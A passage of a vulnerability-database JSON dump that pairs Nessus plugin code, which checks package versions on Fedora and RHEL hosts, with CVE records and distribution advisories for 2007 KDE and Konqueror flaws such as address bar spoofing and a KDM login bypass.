script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kdelibs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kdelibs-apidocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kdelibs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kdelibs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/08/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/11/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 7.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC7\", reference:\"kdelibs-3.5.7-20.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"kdelibs-apidocs-3.5.7-20.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"kdelibs-debuginfo-3.5.7-20.fc7\")) flag++;\nif (rpm_check(release:\"FC7\", reference:\"kdelibs-devel-3.5.7-20.fc7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kdelibs / kdelibs-apidocs / kdelibs-debuginfo / kdelibs-devel\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T04:56:06", "description": "Updated kdebase packages that resolve several security flaws are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe kdebase packages provide the core applications for KDE, the K\nDesktop Environment. These core packages include Konqueror, the web\nbrowser and file manager.\n\nThese updated packages address the following vulnerabilities :\n\nKees Huijgen found a flaw in the way KDM handled logins when autologin\nand 'shutdown with password' were enabled. A local user would have\nbeen able to login via KDM as any user without requiring a password.\n(CVE-2007-4569)\n\nTwo Konqueror address spoofing flaws were discovered. A malicious\nwebsite could spoof the Konqueror address bar, tricking a victim into\nbelieving the page was from a different site. (CVE-2007-3820,\nCVE-2007-4224)\n\nUsers of KDE should upgrade to these updated packages, which contain\nbackported patches to correct these issues.", "edition": 27, "published": "2007-10-09T00:00:00", "title": "RHEL 4 / 5 : kdebase (RHSA-2007:0905)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-4224", "CVE-2007-4569", "CVE-2007-3820"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:kdebase", "cpe:/o:redhat:enterprise_linux:4.5", "p-cpe:/a:redhat:enterprise_linux:kdebase-devel"], "id": "REDHAT-RHSA-2007-0905.NASL", "href": "https://www.tenable.com/plugins/nessus/26951", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0905. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(26951);\n script_version (\"1.30\");\n script_cvs_date(\"Date: 2019/10/25 13:36:12\");\n\n script_cve_id(\"CVE-2007-3820\", \"CVE-2007-4224\", \"CVE-2007-4569\");\n script_bugtraq_id(24912);\n script_xref(name:\"RHSA\", value:\"2007:0905\");\n\n script_name(english:\"RHEL 4 / 5 : kdebase (RHSA-2007:0905)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kdebase packages that resolve several security flaws are now\navailable for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe kdebase packages provide the core applications for KDE, the K\nDesktop Environment. These core packages include Konqueror, the web\nbrowser and file manager.\n\nThese updated packages address the following vulnerabilities :\n\nKees Huijgen found a flaw in the way KDM handled logins when autologin\nand 'shutdown with password' were enabled. A local user would have\nbeen able to login via KDM as any user without requiring a password.\n(CVE-2007-4569)\n\nTwo Konqueror address spoofing flaws were discovered. A malicious\nwebsite could spoof the Konqueror address bar, tricking a victim into\nbelieving the page was from a different site. (CVE-2007-3820,\nCVE-2007-4224)\n\nUsers of KDE should upgrade to these updated packages, which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-3820\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-4224\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-4569\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0905\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kdebase and / or kdebase-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(59, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kdebase\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kdebase-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0905\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"kdebase-3.3.1-6.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"kdebase-devel-3.3.1-6.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", reference:\"kdebase-3.5.4-15.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"kdebase-devel-3.5.4-15.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kdebase / kdebase-devel\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:L/AC:L/Au:S/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:22", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0242", "CVE-2007-4224", "CVE-2007-4225", "CVE-2007-3820", "CVE-2007-1564", "CVE-2007-0537", "CVE-2007-1308"], "description": " [3.5.4-13.el5.0.1]\n - Remove Version branding\n - Maximum rpm trademark logos removed (pics/crystalsvg/*-mime-rpm*)\n \n [3.5.4-13.el5]\n - Resolves: #293571\n CVE-2007-0537 Konqueror improper HTML comment rendering\n CVE-2007-1564 FTP protocol PASV design flaw affects konqueror\n \n [3.5.4-12.el5]\n - resolves: #293421, CVE-2007-3820 CVE-2007-4224 CVE-2007-4225\n - Resolves: #293911, UTF-8 overlong sequence decoding vulnerability, \n CVE-2007-0242\n - Resolves: #293571, Konqueror improper HTML comment rendering, \n CVE-2007-0537 ", "edition": 4, "modified": "2007-10-08T00:00:00", "published": "2007-10-08T00:00:00", "id": "ELSA-2007-0909", "href": "http://linux.oracle.com/errata/ELSA-2007-0909.html", "title": "Moderate: kdelibs security update ", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:52", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4224", "CVE-2007-4569", "CVE-2007-4225", "CVE-2007-3820"], "description": " [3.3.1-6.el4.0.1]\n - turn off '\n \n [3.3.1-6.l4]\n - Resolves: #290851,\n CVE-2007-4569, kdm password-less login vulnerability\n CVE-2007-3820, CVE-2007-4224 CVE-2007-4225, Konqueror address bar spoofin ", "edition": 4, "modified": "2007-10-08T00:00:00", "published": "2007-10-08T00:00:00", "id": "ELSA-2007-0905", "href": "http://linux.oracle.com/errata/ELSA-2007-0905.html", "title": "Moderate: kdebase security update ", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-10-03T11:45:53", "description": "KDE Konqueror 3.5.7 allows remote attackers to spoof the URL address bar by calling setInterval with a small interval and changing the window.location property.", "edition": 3, "cvss3": {}, "published": "2007-08-08T21:17:00", "title": "CVE-2007-4224", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-4224"], "modified": "2018-10-15T21:33:00", "cpe": ["cpe:/a:kde:konqueror:3.5.7"], "id": "CVE-2007-4224", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4224", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:kde:konqueror:3.5.7:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:45:49", "description": "The KDE HTML library (kdelibs), as used by Konqueror 3.5.5, does not properly parse HTML comments, which allows remote attackers to conduct cross-site scripting (XSS) attacks and bypass some XSS protection schemes by embedding certain HTML tags within a comment in a title tag, a related issue to CVE-2007-0478.", "edition": 3, "cvss3": {}, "published": "2007-01-29T16:28:00", "title": "CVE-2007-0537", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0537"], "modified": "2018-10-16T16:33:00", "cpe": ["cpe:/a:kde:konqueror:3.5.5"], "id": "CVE-2007-0537", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0537", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:kde:konqueror:3.5.5:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:45:52", "description": "konqueror/konq_combo.cc in Konqueror 3.5.7 allows remote attackers to spoof the data: URI scheme in the address bar via a long URI with trailing whitespace, which prevents the beginning of the URI from being displayed.", "edition": 3, "cvss3": {}, "published": "2007-07-17T01:30:00", "title": "CVE-2007-3820", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-3820"], "modified": "2018-10-15T21:31:00", "cpe": ["cpe:/a:kde:konqueror:3.5.7"], "id": "CVE-2007-3820", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3820", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:kde:konqueror:3.5.7:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:45:50", "description": "The FTP protocol implementation in Konqueror 3.5.5 allows remote servers to force the client to connect to other servers, perform a proxied port scan, or obtain sensitive information by specifying an alternate server address in an FTP PASV response.", "edition": 3, "cvss3": {}, "published": "2007-03-21T19:19:00", "title": "CVE-2007-1564", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1564"], "modified": "2017-10-11T01:31:00", "cpe": ["cpe:/a:kde:konqueror:3.5.5"], "id": "CVE-2007-1564", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1564", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:kde:konqueror:3.5.5:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:45:48", "description": "The UTF-8 decoder in codecs/qutfcodec.cpp in Qt 3.3.8 and 4.2.3 does not reject long UTF-8 sequences as required by the standard, which allows remote attackers to conduct cross-site scripting (XSS) and directory traversal attacks via long sequences that decode to dangerous metacharacters.", "edition": 3, "cvss3": {}, "published": "2007-04-03T16:19:00", "title": "CVE-2007-0242", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-0242"], "modified": "2017-10-11T01:31:00", "cpe": ["cpe:/a:qt:qt:4.2.3", "cpe:/a:qt:qt:3.3.8"], "id": "CVE-2007-0242", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0242", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:qt:qt:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:qt:qt:4.2.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:45:50", "description": "ecma/kjs_html.cpp in KDE JavaScript (KJS), as used in Konqueror in KDE 3.5.5, allows remote attackers to cause a denial of service (crash) by accessing the content of an iframe with an ftp:// URI in the src attribute, probably due to a NULL pointer dereference.", "edition": 3, "cvss3": {}, "published": "2007-03-07T00:19:00", "title": "CVE-2007-1308", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1308"], "modified": "2018-10-16T16:37:00", "cpe": ["cpe:/a:kde:konqueror:3.5.5"], "id": "CVE-2007-1308", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1308", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:kde:konqueror:3.5.5:*:*:*:*:*:*:*"]}], "fedora": [{"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3820", "CVE-2007-4224"], "description": "Libraries for the K Desktop Environment: KDE Libraries included: kdecore (KDE core library), kdeui (user interface), kfm (file manager), khtmlw (HTML widget), kio (Input/Output, networking), kspell (spelling checker), jscript (javascript), kab (addressbook), kimgio (image manipulation). ", "modified": "2007-10-08T13:58:59", "published": "2007-10-08T13:58:59", "id": "FEDORA:L98DWXZQ015227", "href": "", "type": "fedora", "title": "[SECURITY] Fedora Core 6 Update: kdelibs-3.5.7-1.fc6", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3820", "CVE-2007-4224", "CVE-2007-4225"], "description": "Libraries for the K Desktop Environment: KDE Libraries included: kdecore (KDE core library), kdeui (user interface), kfm (file manager), khtmlw (HTML widget), kio (Input/Output, networking), kspell (spelling checker), jscript (javascript), kab (addressbook), kimgio (image manipulation). ", "modified": "2007-08-20T16:03:39", "published": "2007-08-20T16:03:39", "id": "FEDORA:L7KG38UD012185", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: kdelibs-3.5.7-20.fc7", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3820", "CVE-2007-4224", "CVE-2007-4225"], "description": "Core applications for the K Desktop Environment. Included are: kdm (replacement for xdm), kwin (window manager), konqueror (filemanager, web browser, ftp client, ...), konsole (xterm replacement), kpanel (application starter and desktop pager), kaudio (audio server), kdehelp (viewer for kde help files, info and man pages), kthememgr (system for managing alternate theme packages) plus other KDE components (kcheckpass, kikbd, kscreensaver, kcontrol, kfind, kfontmanager, kmenuedit). ", "modified": "2007-08-20T16:04:15", "published": "2007-08-20T16:04:15", "id": "FEDORA:L7KG42X6012260", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: kdebase-3.5.7-13.fc7", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3820", "CVE-2007-4224", "CVE-2007-4225", "CVE-2007-4569"], "description": "Core applications for the K Desktop Environment. Included are: kdm (replacement for xdm), kwin (window manager), konqueror (filemanager, web browser, ftp client, ...), konsole (xterm replacement), kpanel (application starter and desktop pager), kaudio (audio server), kdehelp (viewer for kde help files, info and man pages), kthememgr (system for managing alternate theme packages) plus other KDE components (kcheckpass, kikbd, kscreensaver, kcontrol, kfind, kfontmanager, kmenuedit). ", "modified": "2007-10-04T18:43:48", "published": "2007-10-04T18:43:48", "id": "FEDORA:L94IHDBG002329", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: kdebase-3.5.7-13.1.fc7", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3820", "CVE-2007-4224", "CVE-2007-4225", "CVE-2007-4569"], "description": "Core applications for the K Desktop Environment. Included are: kdm (replacement for xdm), kwin (window manager), konqueror (filemanager, web browser, ftp client, ...), konsole (xterm replacement), kpanel (application starter and desktop pager), kaudio (audio server), kdehelp (viewer for kde help files, info and man pages), kthememgr (system for managing alternate theme packages) plus other KDE components (kcheckpass, kikbd, kscreensaver, kcontrol, kfind, kfontmanager, kmenuedit). ", "modified": "2007-10-08T13:58:41", "published": "2007-10-08T13:58:41", "id": "FEDORA:L98DWFVB015112", "href": "", "type": "fedora", "title": "[SECURITY] Fedora Core 6 Update: kdebase-3.5.7-1.fc6", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3820", "CVE-2007-4224", "CVE-2007-4225", "CVE-2007-4352", "CVE-2007-5392", "CVE-2007-5393"], "description": "Libraries for the K Desktop Environment: KDE Libraries included: kdecore (KDE core library), kdeui (user interface), kfm (file manager), khtmlw (HTML widget), kio (Input/Output, networking), kspell (spelling checker), jscript (javascript), kab (addressbook), kimgio (image manipulation). ", "modified": "2007-11-13T00:05:02", "published": "2007-11-13T00:05:02", "id": "FEDORA:LAD057UJ022395", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: kdelibs-3.5.8-7.fc7", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:48", "bulletinFamily": "unix", "cvelist": ["CVE-2007-3820", "CVE-2007-4224", "CVE-2007-4225", "CVE-2007-4352", "CVE-2007-4569", "CVE-2007-5392", "CVE-2007-5393"], "description": "Core applications for the K Desktop Environment. Included are: kdm (replacement for xdm), kwin (window manager), konqueror (filemanager, web browser, ftp client, ...), konsole (xterm replacement), kpanel (application starter and desktop pager), kaudio (audio server), kdehelp (viewer for kde help files, info and man pages), kthememgr (system for managing alternate theme packages) plus other KDE components (kcheckpass, kikbd, kscreensaver, kcontrol, kfind, kfontmanager, kmenuedit). ", "modified": "2007-11-13T00:05:02", "published": "2007-11-13T00:05:02", "id": "FEDORA:LAD057H7022394", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 7 Update: kdebase-3.5.8-3.fc7", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-09T00:23:13", "bulletinFamily": "unix", "cvelist": ["CVE-2007-1564", "CVE-2007-1308"], "description": "It was discovered that Konqueror did not correctly handle iframes from \nJavaScript. If a user were tricked into visiting a malicious website, \nKonqueror could crash, resulting in a denial of service. (CVE-2007-1308)\n\nA flaw was discovered in how Konqueror handled PASV FTP responses. If a \nuser were tricked into visiting a malicious FTP server, a remote \nattacker could perform a port-scan of machines within the user's \nnetwork, leading to private information disclosure. (CVE-2007-1564)", "edition": 6, "modified": "2007-03-29T00:00:00", "published": "2007-03-29T00:00:00", "id": "USN-447-1", "href": "https://ubuntu.com/security/notices/USN-447-1", "title": "KDE library vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-09T00:21:11", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4224", "CVE-2007-4225", "CVE-2007-3820"], "description": "It was discovered that Konqueror could be tricked into displaying \nincorrect URLs. Remote attackers could exploit this to increase their \nchances of tricking a user into visiting a phishing URL, which could \nlead to credential theft.", "edition": 5, "modified": "2007-08-26T00:00:00", "published": "2007-08-26T00:00:00", "id": "USN-502-1", "href": "https://ubuntu.com/security/notices/USN-502-1", "title": "KDE vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-09T00:25:52", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0537"], "description": "Jose Avila III and Robert Tasarz discovered that the KDE HTML library \ndid not correctly parse HTML comments inside the \"title\" tag. By \ntricking a Konqueror user into visiting a malicious website, an attacker \ncould bypass cross-site scripting protections.", "edition": 6, "modified": "2007-02-06T00:00:00", "published": "2007-02-06T00:00:00", "id": "USN-420-1", "href": "https://ubuntu.com/security/notices/USN-420-1", "title": "KDE library vulnerability", "type": "ubuntu", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-07-09T00:26:20", "bulletinFamily": "unix", "cvelist": ["CVE-2007-0242"], "description": "The Qt library did not correctly handle truncated UTF8 strings, which \ncould cause some applications to incorrectly filter malicious strings. \nIf a Konqueror user were tricked into visiting a web site containing \nspecially crafted strings, normal XSS prevention could be bypassed \nallowing a remote attacker to steal confidential data.", "edition": 6, "modified": "2007-04-11T00:00:00", "published": "2007-04-11T00:00:00", "id": "USN-452-1", "href": "https://ubuntu.com/security/notices/USN-452-1", "title": "KDE library vulnerability", "type": "ubuntu", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:32", "bulletinFamily": "unix", "cvelist": ["CVE-2007-4224", "CVE-2007-4225", "CVE-2007-3820"], "description": "\nThe KDE development team reports:\n\nThe Konqueror address bar is vulnerable to spoofing attacks\n\t that are based on embedding white spaces in the url. In addition\n\t the address bar could be tricked to show an URL which it is\n\t intending to visit for a 